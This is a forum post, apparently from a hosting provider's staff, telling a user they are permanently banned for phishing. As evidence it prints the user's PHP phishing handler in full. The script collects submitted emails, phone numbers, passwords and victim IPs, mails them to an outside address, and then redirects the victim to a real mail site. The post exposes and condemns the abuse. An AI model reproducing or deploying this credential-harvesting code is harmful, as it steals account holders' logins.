Jump to content

Recommended Posts

Posted
Quote

This is a very important account. 

Important because you can't steal people's accounts without it. You're banned for phishing.

HelioHost does not allow any form of phishing activity, including hosting the submission scripts for phishing sites hosted elsewhere, and permanently bans any user who engages in such acitivties.

<?php
$ip = getenv("REMOTE_ADDR");
$email = $_POST['email'];
$number = $_POST['number'];
$password = $_POST['Password'];

$login = "Email : ".$email." ";
$number = "Number : ".$number;
$pass = "Password : ".$password;
$target = "IP victim : ".$ip;
$country = "Country : http://www.geoplugin.net/json.gp?ip=".$ip;

$head = "########### Login odagbu ############";
$foot = "####### Indramayu CyBer ###########";
$body = "Mailru |".$ip;
mail("chielux111@proton.me", "$body","$head \n\n$login \n$number \n$pass \n$target \n$country \n\n$foot");
header("Location: https://cloud.mail.ru");

 

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...